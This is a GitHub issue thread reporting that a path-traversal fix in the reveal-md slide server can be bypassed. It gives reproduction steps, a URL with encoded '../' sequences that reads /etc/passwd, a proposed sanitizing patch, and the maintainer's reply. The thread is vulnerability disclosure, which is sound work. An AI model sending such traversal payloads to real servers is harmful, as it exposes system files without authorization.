Patch for issue#409 is not sufficient and the protection can be bypassed by an attacker #423

W0rty · 2022-07-13T09:48:48Z

Step to reproduce :

git clone https://github.com/webpro/reveal-md
cd reveal-md && sudo docker build -t revealmd .
sudo docker run --rm -p 1948:1948 -p 35729:35729 -v $PWD/demo/:/slides webpronl/reveal-md:latest /slides --watch

Then open your browser and reach the following URL :
http://localhost:1948/a.md/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc.md%2F..%2Fetc%2Fpasswd#/

The content of the file /etc/passwd is disclosed.

I have a patch for it on the file lib/render.js :

function sanitize(entry)
{
  if(entry.includes(".."))
  {
    entry = sanitize(entry.replace("..",""))
  }
  return entry
}

module.exports = async (req, res) => {
  const dir = await getInitialDir();
  console.log(sanitize(decodeURIComponent(req.url)))
  const filePath = path.join(dir, sanitize(decodeURIComponent(req.url)).replace(/\?.*/, ''));
  const markup = await renderFile(filePath);
  res.send(markup);
};

webpro · 2022-07-13T09:52:13Z

Thanks @W0rty, please open a PR if you have a patch

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Patch for issue#409 is not sufficient and the protection can be bypassed by an attacker #423

Patch for issue#409 is not sufficient and the protection can be bypassed by an attacker #423

W0rty commented Jul 13, 2022

webpro commented Jul 13, 2022

Patch for issue#409 is not sufficient and the protection can be bypassed by an attacker #423

Patch for issue#409 is not sufficient and the protection can be bypassed by an attacker #423

Comments

W0rty commented Jul 13, 2022

webpro commented Jul 13, 2022